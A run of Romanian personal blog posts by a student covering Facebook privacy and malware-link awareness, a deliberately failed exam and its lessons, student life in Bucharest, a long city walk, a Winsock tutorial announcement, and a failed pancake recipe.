Traim in era informatiei, si asta nu se rezuma numai la informatiile de pe Internet, se rezuma si la noi si la ce stie lumea despre noi. Si nu e normal ca persoane care nu ne sunt prieteni sa poata intra in posesia unor date despre noi din doua click-uri. Bine, probabil nu acordati prea multa importanta acestor lucruri aparent marunte pe care le faceti publice, dar stiti cum e, de multe ori detaliile conteaza, si din aceste mici detalii se pot afla diverse informatii despre voi. Unii, la fel ca si mine, sunt atenti la astfel de detalii.

Facebook ofera un foarte bun control al informatiilor si ne permite sa alegem cui le facem publice, dar cele mai multe persoane nu profita de aceasta optiune de “Privacy” oferita de Facebook. Eu sunt atent la aceste detalii, si pe langa poza de profil, singura informatie publica este “Sex: Male”. De ce as face mai multe informatii publice? Daca cineva ma cunoaste, ma va recunoaste in poza si imi va da o “cerere de prietenie”. Daca o cunosc pe respectiva persoana, voi accepta cererea si va avea acces la toate detaliile despre mine, de la poze la numarul de telefon.Deci da, am in lista aproximativ numai persoane pe care le cunosc personal, sau cel putin din vedere + inca cateva.

Aici intervine si problema: “Pe cine accept in lista mea de prieteni?”. Este la moda sa ai cati mai multi prieteni. Desigur, cele mai “vanate” sunt fetele, care din moment ce isi pun o poza sexy la profil incep sa primeasca zeci de cereri de prietenie. Asta ar fi ceva normal, mai putin normal este ca ele de cele mai multe ori accepta aceste cereri si o gramada de persoane necunoscute intra in posesia pozelor si a altor informatii despre acea persoana.

Poate o sa ma considerati paranoic. Nu e asa, nu cred ca am dusmani care imi vor raul si sa nu vreau sa afle informatii despre mine, dar sunt foarte atent la informatiile personale pe care le ofer, chiar si cu prietenii, si cei mai buni prieteni va pot confirma ca nu sunt genul de persoana care vorbeste foarte mult despre ea, dimpotriva, sunt extrem de limitat in aceasta privinta. Astfel pastrez constant un avantaj fata de persoanele din jurul meu, avantajul pe care il ofera informatia, indiferent de cat de neimportanta pare.

Aplicatiile Facebook

Fie ca va plac jocurile, fie ca va atrag diverse aplicatii de socializare, folositi aplicatii Facebook. Desigur, in mare nu ar fi probleme cu aceste aplicatii, dar aceste aplicatii au acces la informatii personale despre voi, informatii pe care voi acceptati sa le oferiti atunci cand instalati o aplicatie. Am selectat o aplicatie la intamplare care imi cere acordul pentru informatiile de profil si acordul pentru a scrie mesaje pe peretele meu. Bun, de ce as vrea ca o aplicatie sau autorul acesteia sa aiba acces la informatii personale? Nu as vrea. Da, uneori sunt necesare cateva informatii ca lista de prieteni, dar nu si altele.

In plus, eu nu as permite sa imi scrie mesaje pe perete. Aici deja apare Spam-ul, adica mesajele inutile, reclame sau ce mai sunt, pe peretele meu. Pe langa faptul ca e enervant sa vezi zeci de mesaje pe perete scrise de o aplicatie, gen jocurile care anunta ca “ai castigat inca 3 puncte, poti sa le bagi undeva”, aceste mesaje apar si pe peretii prietenilor nostrii. Nu te deranjeaza pe tine? Atunci gandeste-te ca poate ii deranjeaza pe prietenii tai. De aceea am fost nevoie sa blochez vreo 30 de aplicatii mai populare, dar extrem de stupide si inutile. Puteti face doar cateva setari la “App settings“.

Virusi?

Da, de ceva timp este la moda sa se imprastie virusi pe Facebook. Ce fac acestia? De cele mai multe ori sunt IRC Boti, care au rolul de a permite celui care il foloseste (nu neaparat programatorului care l-a facut) sa foloseasca conexiunea voastra la Internet pentru ceea ce multi numesc “flood” sau DDOS, adica pentru a trimite multe pachete (controlate de cel care v-a infectat) catre diverse tinte. Cred ca se mai folosesc si Stealere, adica mici aplicatii care citesc parolele salvate in browser (Mozilla Firefox, Internet Explorer, Google Chrome) si le trimit atacatorului. Sau ,de ce nu, Keyloggere, mici programe care captureaza toate tastele apasate, inclusiv parolele si le trimit atacatorului. Apoi veniti cu tampenii ca “Vai, mi-a spart un hacker parola!”.

Cum sa nu va infectati? E stupida aceasta intrebare. Ar fi mai potrivita intrebarea: “Cat de batut in cap sa fiu sa ma infectez singur”. Virusii nu sar de pe Internet in calculator, asta se intampla doar daca sunt probleme de securitate in browser si daca atacatorul este unul foarte inteligent, deci nu il va interesa parola voastra de Facebook, ci parole de la conturi bancare. Daca aveti ultimele versiuni de browsere nu veti avea probleme. Pana acum nu am vazut decat doua moduri de raspandire ale virusilor pe Facebook si anume prin mesaje postate pe peretii prietenilor, sau pe propriul perete sau prin mesaje trimise pe chat. Astfel, daca vedeti ca un amic posteaza un link aparent de Facebook (de aplicatie de cele mai multe ori) impreuna cu o descriere ciudata, si la click pe acel link sunteti invitati sa descarcati ceva ce aparent e o fotografie dar de fapt e un executabil, ar fi de preferat sa nu o faceti. Un exemplu vazut de mine, ar fi redirectionarea catre o pagina cu mesajul “Web page not found”, apoi mi se oferea sa descarca fbpic-34453445345.EXE. Din acel .EXE ne dam seama ca NU e vorba de o fotografie, ci de un executabil “rau” care nu trebuie executat. Cred ca ati prins ideea.

Posturi inutile

Vi se pare ca aveti pe perete o gramada de posturi inutile? Nu va intereseaza ce a facut x si y? Sau nu va intereseaza cate puncte a acumulat Vasile intr-un joc de 2 lei? E vina voastra ca nu aveti grija de perete si sa aveti pe el numai informatii cu adevarat utile. Daca munciti putin, puteti regasi doar informatiile care va intereseaza.

Probleme e ca majoritatea dintre voi adaugati in lista de prieteni persoane pe care nu le cunoasteti. Da, asta in seamna in mare socializarea, sa cunosti persoane noi. Dar sa fim seriosi, exista o chestie numita VIATA. Daca vrei sa cunosti pe cineva, nu cunosti pe Facebook, ci iesi frumos afara si socializezi. Lasand asta la o parte, important e ca daca aveti in lista multe persoane necunoscute, veti regasi o gramada de lucruri despre ele si veti pierde informatii importante despre prieteni. Puteti astfel incepe sa dati “Remove” la persoanele “inutile” in lista de prieteni.

Urmatoarea problema ar fi aplicatiile. Insa acestea pot fi blocate cu cateva click-uri. Doar intrati pe pagina aplicatiei si dati “Block”, astfel veti scapa de mesajele stupide si fara rost care va apar pe perete din cauza acelei aplicatii.

Singurele posturi inutile pe care nu le poti filtra din Facebook sunt mesajele “Vasile s-a imprietenit cu Gheorghe si inca 2000 de tarani”. Facebook nu iti ofera posibilitatea de a le filtra, dar s-au gandit altii la aceasta problema si puteti folosi pentru Mozilla Firefox addonul Feed Filter care va permite sa filtrati aceste mesaje si are multe alte optiuni. Il instalati si doar mergeti laFeed Filter Options > News Feeds si bifati “Hide is now friends with someone”, sau ce alte optiuni mai doriti.

Informatiile aparent inutile despre prieteni pot fi extrem de utile. Putem afla ce lucruri le plac si ce anume urasc, cum reactioneaza cand sunt suparati, ce muzica asculta, cred ca putem afla orice despre ei, fara sa isi dea seama, si asta doar fiind atenti la mici detalii care spun ceva despre ei.

Cam asta am avut de spus, daca imi mai vin idei voi veni cu completari.

Stiu ca nu am prea multa experienta cu examenele, dar incerc sa invat din greseli si sa nu le mai repet si as dori sa va ajut sa faceti acelasi lucru.

Sa vedem cum sa treaba: in timpul anului, lumea vine la scoala, mai mult sau mai putin. Desi aparent nu prezinta atat de multa importanta, in cele 2-3 zile in care se invata pentru un examen, prezenta la scoala va influenta semnificativ procesul de invatare (una e sa ai cursuri scrise de tine, vei stii in mare despre ce e vorba…). Dar invatatul propriu-zis dureaza 2-3 zile, maxim. Desigur, “greul” se pastreaza pentru ziua de dinainte de examen, ceea ce nu recomand si sper sa nu mai fac acest lucru.

E foarte important cum gandesti un examen. Astfel, eu definesc 2 tipuri de persoane: clasa generala a studentilor, cei care vor nota 5, si “ceilalti”, care vor o nota mai mare de 5, de preferat cat mai apropiata de 10. Desigur, acestia din urma vor fi cei mai stresati, se vor chinui cel mai mult cu invatatul iar daca vor fi intrebati vor spune ca nu au invatat si nu stiu nimic, dar ca spera si ei la un 5. Desigur, marea majoritate a acestora nu au probleme cu examenele si le trec cu brio.

Problema trecerii examenului apare la studentii “vreau un 5″, care sunt constienti ca nu au invatat dar incearca si ei cat de cat sa invete cate ceva. Aici se face diferenta: cei care sunt stresati ca pica au din start un dezavantaj fata de cei care stau mai linistiti. Dar in final, totul se rezuma la notiunea abstracta de “noroc”: daca au invatat si ei 2 pagini si subiectele sunt din acele pagini, daca pot copia cate ceva…

Un lucru pe care nu prea il inteleg este stresul de dupa examen. Greul a trecut, fapta a fost consumata, nu te poti intoarce sa mai scrii ceva pe foaie, deci, de ce sa stai panicat in timp ce astepti rezultatul? Nu cred ca asta ajuta cu ceva.

Acum sa definesc modul in care am privit eu ultimul examen: la misto. Am plecat cu ideea ca e un examen greu, ca este multa materie si este foarte greu de invatat si ca nu am timp sa invat. Astfel, pana in noaptea de dinainte de examen nu am invatat nimic. Desigur, pe la curs nu am dat decat la inceput, deci nu aveam nici cea mai mica baza de la care sa pornesc. Initial citesc si eu 2 pagini, sa vad daca “merge treaba”, dar avand deja fixata ideea ca o sa pic, ma demoralizez si imi dau seama ca nu voi reusi sa iau acel examen. Asa ca las cursurile si trec pe vin.

Dimineata stiam deja cum se va desfasura totul, stiam ca voi pica si nu aveam sa ma stresez deloc cu acest examen.

In timpul examenului, vazand subiectele si fiind total paralel cu ele, am decis sa stau linistit si sa fac din acest examen, cel mai simplu si lejer examen posibil: cel pe care il pici, dar stii asta deja.

Astfel, in prima jumatate de ora, intins pe spate, cu mainile la ceafa ma uitam zambind la colegii mei panicati care incercau sa scrie cate ceva. A valorat mult pentru moralul meu sadic aceasta priveliste: O restanta: 20 de RON, colegii mei panicati incercand sa scrie cate ceva? De nepretuit!

Urmatoarea jumatate de ora am incercat sa imi dau seama cum se desparte cuvantul “restanta” in silabe: RE-STAN-TA sau RES-TAN-TA? Sincer, nici acum nu stiu.

Initial, am scris pe banca ceea ce simteam in acel moment si anume faptul ca eram constient ca voi pica si ca nu are rost sa fac riduri de la stres din aceasta cauza:

• O sa pici,
• Nu te stresa.
• Viata e prea scurta
• Sa o poti rata!

Apoi am inceput sa plictisesc, si cum tot nu aveam ce face am decis sa scriu o poezie despre un examen:

• Au ramas cateva zile
• Pan’ examenul sa vie
• Cum la scoala nu ai dat
• Esti putin cam speriat

• Dar ai timp a invata
• Asa ca nu te stresa
• Fa si tu ceva dragut
• Sa ramana-n sufletut

• Nu mai bine iesi pe-afara
• Si mai faci o prostioara?
• Ca sa-nveti nu e frumos
• Si e foarte plicticos.

• Sesiunea a-nceput
• Dar timpul nu e pierdut
• Si acum te poti distra
• Mai bine ca… altcandva.

• Zece este cam putin
• Cu el nu ne multumim
• Aspiram la un cinciar
• Care-i mare gagicar.

• Insa 5 e greu de luat
• Multa truda-n copiat
• Insa nu-i asa usor
• Si poti sa pici in namol…

• Chiar de sunt cateva zile
• Nu-nvata chiar in prostie.
• Iesi pe-afar si bea o bere
• Fa din invatat placere.

• Cum sa-nveti, asta conteaza
• Cel mai bine-ncepi cu-o pauza.
• Numai sa fii relaxat
• Cand te-apuci de invatat.

• Cu o seara inainte
• Mintea-ti iese din orbite.
• Dar tu sa stai linistit
• Sa fii foarte odihnit.

• La examen, fii pe faza
• Daca nu stii, copiaza!
• Important e sa traiesti
• Nu sa-nveti sa-nnebunesti.

Lasand la o parte limbajul colecvial folosit si impresia ca poezia a fost scrisa de un pusti de clasa a V-a, cred ca se pot extrage cateva idei din aceste versuri.

Dupa toate acestea, dau foile albe si ies din sala cu zambetul pe buze, afland chiar pe loc rezultatul acestui examen: 2, deoarece domnul profesor a fost dragut si mi-a oferit un punct de la dansul.

Fapta a fost consumata si eu nu aveam nici un stres. Insa incep sa vorbesc cu lumea si observ ca am dezamagit unele persoane, desigur, persoane apropiate carora la pasa de mine si incep sa ma simt prost si sa realizez ca am facut o greseala luand acest examen la misto. Abia dupa examen realizez ca va trebui sa invat acele cursuri urate in vara si sa dau acest examen din nou. Ceea ce am facut eu este o mare greseala, puteam incerca macar sa fac ceva. Nu faceti aceeasi greseala ca mine.

Dar mie imi place sa privesc intotdeauna partea buna a lucrurilor. Am invatat ceva din aceasta experienta si anume sa nu mai iau viata “la misto”. Am invatat sa gandesc de 20 de ori inainte de a face un lucru si sa nu mai aman tot timpul o actiune, pana cand sa realizez ca nu mai am timp sa o pot duce la indeplinire. Am invatat ca trebuie sa iau aceste examene si ca le iau pentru mine, ca intr-o oarecare masura viata mea depinde de ele. Am invatat ca viata de student are greutatile ei, dar peste care se poate trece fara un efort exagerat.

Acestea fiind spuse, sfatul meu e simplu: invatati! Nu trebuie sa o faceti exagerat, o faceti cat si cum credeti ca e  de cuviinta. Daca nu vreti sa invatati pentru voi, macar faceti-o pentru persoanele care tin la voi. Daca voua nu va pasa de ce nota luati, incercati sa luati o nota buna pentru persoanele carora le pasa ce nota luati.

Aveti grija de voi si multa bafta in sesiune.

Dar mai bine sa gandim practic.

Pentru cei mai multi dintre noi, sa mergi la facultate inseamna sa te muti din orasul natal intr-unul mai mare, in cazul meu Bucuresti. Acest lucru aduce cu sine o importanta serie de schimbari in viata fiecaruia.

Mutandu-ne intr-un nou oras, lasam in urma familia si prietenii. Poate suna putin dur, dar acesta e adevarul. Relatia noastra cu familia si cu vechii prieteni, cel putin cu cei care nu ne uita nu va mai fi niciodata la fel, de vina fiind distanta. Desigur, pastram legatura prin telefon sau prin deja clasicul messenger, dar nimic nu se compara cu o discutie fata in fata cu un vechi prieten.

Cu familia insa recuperezi o parte din timpul pierdut. De sarbatori, in weekend-urile in care te intorci acasa. Aparent e la fel, dar daca priviti atent veti observa ca sunt mici diferente fata de trecut.

Dar sa te muti intr-un oras nou nu inseamna ca te indepartezi de toata lumea. In cazul meu, cea mai mare parte a colegilor de liceu sunt in Bucuresti, ceea ce inseamna mai mult decat ati crede initial. E relaxant sa stii ca atunci cand ai nevoie de ajutor ai la cine apela, ca atunci cand vrei sa depanezi amintiri ai cu cine, ca atunci cand ti se face dor de cineva sa te poti intalni cu persoana respectiva. Eu am fost singurul care s-a intalnit cu toti colegii care sunt in Bucuresti, si am pastrat relativ legatura cu toti, mai mult sau mai putin. Vreau sa ma vad, nu cu toti, dar cel putin cu  o parte dintre ei, de cel putin cateva ori pe an. In liceu nu am fost o clasa foarte unita, cred ca nimeni nu poate spune ca facea parte dintr-o clasa unita, sunt diferiti, foarte diferiti si de accea nu putem actiona impreuna in diverse imprejurari. Astfel, foarte putini colegi de liceu pastreaza o legatura mai stransa intre ei, cate 2-3.

In schimb, aici te ajuta facultatea. Iti faci foarte multe cunostinte, nu prieteni. La fel este si in cazul meu, mi-am facut multe cunostinte, dar foarte putini prieteni. Prieteniile mai stranse cred ca o sa apara din anul II, acum e momentul sa ne cunoastem mai bine si sa ne alegem prietenii.

E foarte important unde alegi (unde ai posibilitatea) sa locuiesti pe durata facultatii. Eu am vrut intotdeauna sa stau la camin si sunt foarte putine lucruri de care pot sa ma plang. Suntem 7 in camera, dar foarte rar suntem toti “acasa”. Bine, nu e o camera obisnuita, e o fosta sala de lectura, daca aranjam putin camera, am putea juca linistiti tenis de picior acolo. Pe langa faptul ca ai un adevarat sprijin in colegii de camera, mai sunt si camerele vecine. Ne intelegem foarte bine cu vecinele (:*). Ii compatimesc pe cei care stau in apartamente sau garsoniere, cate unul, doi sau trei. Da, inteleg, sunt momente in care avem nevoie de intimitate, sa fim singuri cu noi insine, dar nici sa fim niste pustnici nu e bine.

Ca oras, Bucurestiul mi-a placut inca de la inceput. E un oras mare cu multe oportunitati. Cunosti oameni noi, oameni cu o gandire complet diferita de a ta, oameni cu alte experiente de viata si inveti multe lucruri noi. Nu trebuie sa meditezi ani intregi sa iti dai seama ca bucurestenii gandesc altfel decat cei din orasul tau. Spunea cineva: “E un oras trist” si trebuie sa ii ofer dreptate. Bucurestenilor le pasa numai de ei, nu le pasa de ceea ce se intampla in jurul lor si de aceea aici poti merge cu o pereche de chiloti pe cap, de exemplu, fara sa fii remarcat, merg cu privirea inainte fara sa se uite in jurul lor, se grabesc tot timpul, desi nu cred ca e un lucru necesar si foarte rar vezi pe chipul cuiva un zambet sau cel putin o tentativa de zambet. Si nu asta ar fi problema, problema este ca se molipseste. Incet, incet incepem sa devenim la fel desi nu prea observam acest lucru. Imi zicea cineva ca de cand m-am dus la Bucuresti sunt mai rau, si da, are dreptate. Si acest lucru nu se intampla numai in cazul meu. Vad pe fostii mei colegi aceasta schimbare, cum persoane pe care le cunosc destul de bine incep incet, incet sa se schimbe, si asta intr-un fel de rau.

Partea frumoasa a acestui nou inceput este ca acum ai toata libertatea pe care ti-o poti dori. Nu mai trebuie sa dai explicatii nimanui, pleci de acasa si te intorci la orice ora vrei, faci cam ce vrei. Insa trebuie sa ai mare grija de tine. Da, inveti sa te pretuiesti mai mult, sa iti pese mai mult de tine decat de ceilalti, devii mai increzator in propriile forte. Sfatul meu pentru voi, noii veniti in acest oras, este sa nu aveti incredere deplina decat in propria persoana. Sunt foarte multe persoane cu 2 fete. Increderea se castiga in timp, nu in 2-3 saptamani.

In rest, la facultate nu prea imi place. De aceea nici nu ma aflu foarte des la scoala. A trecut ceva timp si chiar nu pot sa inteleg ce legatura are matematica cu informatica. Da, matematica de clasa a V-a, dar nu latici sau cine stie ce prostii mai fac pe la cine stie ce pseudo-materii care desigur nu ma vor ajuta foarte mult in viata.

La asta gandesc eu in aceasta seara, la viitor si la cum sa imi construiesc acest viitor. De mine depinde totul.

Pasiti cu incredere, dar si cu grija.

E vorba de ceva ce voiam sa fac mai demult, si anume sa merg de la statia de metrou Preciziei, pana la Anghel Saligny… Pe jos, desigur.

Fiind frumos afara, dormind bine, avand energie, am decis sa incerc sa fac acest drum in aceasta sambata.

Pe la ora 14:30 plec de acasa, si ajung pe la 14:50 la statia Preciziei. Si asa incepe calatoria.

Stiam unde ma aflu, desi initial ma asteptam sa ies la Bd. Iuliu Maniu, statia de metrou e de fapt pe Sos. Preciziei. Drumul nu a fost deloc complicat. Am mers pe Sos. Preciziei pana la autogara Militari, si de acolo pe Bd. Iuliu Maniu. De la Piata Leul, am mers pe Sos. Cotroceni pana la Podul Cotroceni (intre Eroilor si Grozavesti) si de acolo, pe langa Dambovita pana la Piata Unirii unde am facut o pauza de 5 minute, sa imi consult tovarasa de calatorie, harta, si sa decidem in ce directie sa mergem mai departe. Mai departe, la fel, am mers pe langa Dambovita, am trecut pe langa statia de metrou Timpuri Noi (desi puteam alege un drum mai scurt pentru a ajunge la Anghel Saligny, am decis sa vizitez toate statiile de metrou de pe M3) apoi am facut stanga la intersectia dintre Splaiul Unirii si Mihai Bravu. Am mers pe Mihai Bravu pana la intersectia cu Bd. Camil Resseau, la statia Dristor, si de acolo am pornit pe Camil Resseau. Am ajuns la Nicolae Grigorescu, si de aici cred ca a inceput Bd. Theodor Pallady. De la statia 1 decembrie 1918, a inceput sa fie cam pustiu drumul, si eu sa fiu printre singurele persoane de pe strada. Dar nu m-am dat batut, si am mers lejer, pana la capat, pana la Anghel Saligny.

Cam asta ar fi pe scurt, nu m-am ratacit, nici nu aveam cum, aveam harta cu mine, dar la un moment dat facusem dreapta pe Calea Vitan, in loc sa merg mai in fata cum trebuia, dar mi-am dat seama dupa 20 de metri ca nu sunt pe drumul cel bun.

Poate va intrebati de ce am facut asta. De fapt, intr-un fel, si eu ma intreb de ce am facut asta. Am facut asta pentru ca voiam sa vizitez orasul, vreau sa il invat, si mersul pe jos e cea mai buna metoda de a-l invata. A, desigur, imi place mult sa merg pe jos. Nu stiu cati km am mers, eu cred ca au fost in jur de 18 km, dar nu am unde sa stiu. Desigur, la intoarcere am luat metroul, mi-a placut statia Anghel Saligny, e frumos aranjata, sunt altfel de unitati de verificare a cartelelor, cred ca la fel sunt si 1 Decembrie 1918 si Nicolae Teclu.

Si ca sa imi satisfac o alta curiozitate, am mers cu metroul pana la Preciziei, sa vad cam cat ar dura drumul. Si a fost am ajuns al dracu de repede, in jur de 30 de minute.

Am salvat pe telefon orele la care am ajuns la diverse statii de metrou, insa nu la toate:

• Preciziei: 14:50
• Lujerului: 15:30
• Eroilor: 16:10
• Piata Unirii: 16:40
• Mihai Bravu: 17:20
• Dristor: 17:40
• Nicolae Grigorescu: 18:00
• Anghel Saligny: 18:50

Dupa cum puteti vedea, calatoria a durat 4 ore. Deci nu a fost chiar atat de mult.

E foarte posibil sa vi se para ca am facut o prostie, sa credeti ca m-au scapat parintii in cap cand eram mic, dar mie mi-a placut calatoria, nu sunt foarte obosit, de fapt nu ma simt mai deloc obosit, si asa am invatat si eu mai bine o parte buna din oras.

Daca va intrebati cumva: “Sunt caini in Bucuresti”, raspunsul e DA. Sunt foarte multi. Am vazut o gramada, dar dintre toti pe care i-am vazut si pe langa care am vazut, doar 2 serii de 3-4 caini au latrat la mine, dar nu m-au atacat. Ideea e sa nu ii bagi in seama, ei sunt invatati cu lumea, si treci pe langa ei fara probleme. Ai avea probleme doar daca te-ai speria si ai incepe sa fugi.

Ma intreb daca sunt singurul care a facut asta, dar nu cred, insa nici nu imi pasa. “Mersul pe jos face piciorul frumos” si am luat-o si ca pe un antrenamet pentru fotbal, pentru rezistenta, cred ca am facut un lucru bun.

Sunt sigur ca nu am facut un lucru imposibil, si stiu ca multi ar putea face asta din punct de vedere fizic, dar foarte putini din punct de vedere psihologic.

Acestea fiind spuse, daca cineva are de gand sa faca un drum Pipera – Berceni sa ma anunte si pe mine.

Am ales Bucuresti si nu un alt oras din mai multe motive: un oras mare, multe oportunitati, ai de unde alege in orice domeniu, se gaseste un loc de munca mai usor, facultatile cred ca sunt mai bune decat in alte orase, aici au venit aproximativ toti fostii colegi de liceu, am niste rude aici si multe altele.

Dupa cum ma asteptam sunt multe diferente intre Rm. Valcea, orasul meu natal si Bucuresti, dar m-am acomodat foarte repede. In primul rand, ceea ce nu am suportat de la inceput, si probabil nu voi suporta niciodata: Cum intra lumea in tramvai/troleibuz/autobuz si mai ales in metrou, se arunca cu toata viteza spre primul scaun liber, de parca au mers pe jos sute de kilometri.

Cu aglomeratia m-am obisnuit, si nu pot zice ca imi displace. Nu e foarte frumos cand te indesi intr-un autobuz plin, dar astfel ajungi si tu la timp la cursuri.

Ce nu imi place este ca ma “cearta” unele persoane ca folosesc perfectul simplu, eu fiind de fel oltean. Insa nu ma descurajeaza, si cum sunt de parere ca e mai corect sa folosesti perfectul simplu, care desemneaza o actiune recenta, din ziua curenta, decat perfectul compus care poate desemna o actiune facut acum 50 de ani (“venii de la fotbal” (acum, azi) nu “am venit de la fotbal” (Cand? Azi, acum 3 zile sau acum 20 de ani? E incert)), o sa il folosesc in continuare.

Cineva din Valcea, fiind pentru a II-a oara in Bucuresti zicea acum cateva zile: “E un oras trist” si trebuie sa fiu de acord. E adevarat, bucurestenii se uita doar in fata, nu le pasa de ce se intampla in jurul lor, traiesc intr-o monotonie continua, nu prea zambesc…

Un lucru foarte important pentru mine, a fost sa ma revad cu fostii colegi de liceu. Desigur, nu cu toti, dar cum m-am inteles bine cu o mare parte dintre ei, as fi vrut sa ma intalnesc cu mai multi, insa asa cum aflasem de la alte persoane, am aflat si pe pilea mea ca legaturile din liceu se vor pierde aproape in totalitate. Nu va faceti planuri, si eu mi-am facut cateva, dar mi-am dat rapid seama ca nu le voi putea duce la capat. M-am revazut cu cativa, altii nu au putut… As fi vrut sa ne intalnim mai multi, dar asta e practic imposibil.

Cu scoala nu pot zice ca merge excelent. Sunt la Informatica la Universitate si fac jumatate din cursuri informatica, si cealalta jumatate matematica, dar nu mi-a placut niciodata matematica. Sper sa ma obisnuiesc cu timpul si cu aceasta materie care face multe “victime”. Mai plec de la cursuri/seminarii, la unele nu am mai fost de 3 saptamani, dar vreau ca saptamana viitoare sa stau la toate (desi cred ca nu voi reusi).

Nu prea stiu ce sa spun de colegii de la facultate. Ca sa fiu sincer, majoritatea nu prea imi plac. Nu sunt prea veseli, se axeaza prea mult pe invatat, nu le pasa de alte lucruri. A, da, nu sunt foarte inteligenti, dar ei se cred ai dracu de destepti. Dar am prietenii mei cu care ma inteleg bine. A, sunt si cateva fete dragute in serie.

Un alt lucru de mentionat ar fi ca m-am inscris la fotbal, imi place foarte mult si vreau sa joc mai bine. Luni a fost Cupa AS-MI (a facultatii de matematica-informatica) unde am jucat portar (incepusera coechipierii sa se certe care sa stea in poarta si m-am oferit eu) si am castigat locul I. Am primit o cupa si o diploma. Numele echipei noastre a fost “Hackerii”, deoarece asa le spune domn’ profesor de sport studentilor de la informatica. Bine, am avut si echipa buna, 2 colegi de camera si alti baieti care “stiau cu mingea”.

Si mai e cu caminu… Pff, e super la camin. Cu colegii ma inteleg bine, 4-5 (suntem 7, intr-o camera care era sala de lectura, destul de mare zic eu, cei care au vazut-o stiu ce vreau sa zic) dintre noi facem exercitii in camera, avem o haltera de 25 de kg cu care facem tot felul de exercitii. Ne intelegem bine cu vecinele si cu cativa vecini, ne strangem de multe ori afara pe hol, am fost la “fotbal” cu fetele, am facut gratar, am facut “mese comune”, jucam Mafia si multe alte prostii, bem, mai vine un baiat cu chitara si ne canta (tot venind pe la noi, l-am facut sa ne cante si vreo 2 manele, eu ascultand acest gen muzical), gasim intotdeauna ceva de facut, nu prea avem timp sa ne plictisim.

Cu banii, daca ai putin creier, te poti descurca foarte bine. Ai de unde alege, poti gasi acelasi produs intr-un loc, de 3 ori mai ieftin decat in altul. Bine, daca ai multi bani, chiar ai ce face in acest oras. Dar si cu posibilitati mai limitate o poti duce destul de bine.

As vrea sa ma mai intalnesc si cu prietenii din Rm. Valcea, sa vad ce mai fac, desi eu mai dau din cand in cand cate un telefon (celor care sunt in aceeasi retea, stiu, trist, dar asta e adevarul). Ma simt bine cand ma intorc acasa, dar caminul a devenit noua mea casa, cand ajung la camin, nu ajung cu parere de rau.

Pe scurt, imi place!

Articolul acopera notiunile elementare despre Windows Sockets (Winsock) API, functiile pentru accesul brut la Internet al unei aplicatii.

Desi este destul de dificila folosirea acestor functii in comparatie cu unele solutii mai moderne ca .NET sockets, va ofera mult mai multa libertate, si astfel veti intelege mult mai bine ce se intampla in “fundal”.

Articolul se adreseaza in special programatorilor C++ si Visual Basic 6, atat incepatori cat si avansati. Contine exemple de cod in aceste limbaje, cu comentariile de riguare, astfel este foarte usor de inteles ce face acea portiune de cod.

O lista cu link-uri de unde puteti descarca articolul (versiune PDF):

http://rapidshare.com/files/415254254/Tutorial_Windows_Sockets_API.pdf

http://www.filehost.ro/1387331/Tutorial_Windows_Sockets_API_pdf/

http://www.girlshare.ro/1526066.3

Daca aveti intrebari le puteti scrie si aici la comentarii, sau aici: http://rstcenter.com/forum/25314-rst-windows-sockets-api-c-vb6.rst

Daca nu sunteti un adept al limbajelor C++ sau Visual Basic 6 ci al unui alt limbaj (de programare), dar stiti totusi cate ceva despre functiile API, despre parametrii transmisi prin valoare sau referinta si alte lucruri de baza, puteti citi articolul si nu cred ca veti avea probleme in a-l intelege.

Este prima parte a articolului, sunt foarte multe de spus, il voi continua il limita timpului disponibil.

Acum doua zile, din lipsa de ocupatie, imi propun sa fac clatite. Dar cum nu avea farmesc sa fac reteta mea clasica de clatite cu praf de frisca sau praf de budinca pe care o puteti gasi aici pe blog, am vrut sa incerc o noua reteta.

Aveam de ceva timp ideea in cap si am decis sa o pun in practica. Si ingredientele noi erau: crema de prajituri (praf pentru crema de prajituri) si nuca de cocos. Si am mai pus si un pliculet de praf de copt, ingredient pe care nu l-am mai folosit.

Si am trecut la treaba. Am adaugat toate ingredientele (pe langa 1 litru de lapte am mai pus niste apa, pentru ca laptele nu a fost de ajuns) si am amestecat vreo 20 de minute, pana au inceput sa ma doara mainile.

Apoi sa le pun in tigaie. Iau o tigaie mare de teflon si pun coca in ea. Dureaza vreo 10 minute pana se face (pana se poate desprinde) si o mai intorc putin si pe cealalta parte.

Apoi vine punctul culminant, cand trebuie sa gust tampenia. Desi ma asteptam sa iasa naspa rau de tot, a fost totusi mai rea la gust decat ma asteptam. Dar am mancat-o. Am mai pus zahar si am mai facut inca doua clatite, una groasa si una subtire, gandindu-ma ca poate asa ies mai bine. Le-am mancat pe amandoua desi nu prea imi placeau deloc (am pus miere pe ele).

Apoi ma dau batut, si le las. Vine mama si zice ca incearca ea mai tarziu sa faca ceva cu compozitia.

Nu trec 5 minute si incepe sa imi fie rau de la clatite. Dar imi trece repede

Ziua urmatoare, ma uit in frigider si vad compozitia ramasa (multa). Bucuria mea, pentru ca mai aveam o idee stupida in cap.

Si trec la treaba. Adaug multa faina, torn multa zahar cu chestia in care era si miere cu borcanul (destula) pana iese o compozitie mai tare, o amestec bine si… o bag in cuptor sa fac prajitura

O las ceva timp, opresc cuptorul si o las sa se intrepatrunda. Apoi momentul adevarului, o scot (arata cam aiurea, era cam urata) si incerc sa o tai. Hmm, norcul meu ca fac sala, nu stiu daca reuseam altfel.

Si o gust. Avea un gust de… nimic. Chiar nimic! De fapt nu era chiar ca nimicul, deoarece nimicul nu are un gust naspetel. Dar am mancat totusi cateva bucatele (si am mai fortat pe cineva sa manance ) si era totusi comestibila, adica nu mureai daca mancai. Dar am pus miere pe ele, si parca aveau un oarecare gust, dar tot nu v-as fi sfatuit sa mancati asa ceva.

Se pare ca dupa 2 zile inca traiesc.

Aveti aici o arhiva cu cateva poze, sa ma vedeti in actiune:

http://www.speedyshare.com/files/24010862/DSCN4444.JPG.rar

E ceva de genul “Nu incercati asa ceva acasa”. Deci, aveti grija!

Sa incepem cu ora la care se merge. Eu am fost de dimineata pana spre seara, ceea ce nu va recomand. Ideea e simpla, intr-un anumit interval orar Soarele se afla mai aproape de… tine decat in alte intervale, si e vorba in special de orele 12:00-15:00. De aceea si razele sunt mai puternice, in special razele ultraviolete.

Fetele de obicei se duc la piscina sa faca plaja, adica nu prea intra in apa, ceea ce e o mare prostie, mai ales ca stau mai mult decat ar trebui in soare si nu prea stau la umbra. Ideea pe care merg e simpla: “Vreau sa ma bronzez, sa arat mai bine”. Da, si dupa parerea mea ii sta mai bine unei fete sa fie bronzata (cel putin vara) decat sa fie alba. Dar de multe ori exagereaza.

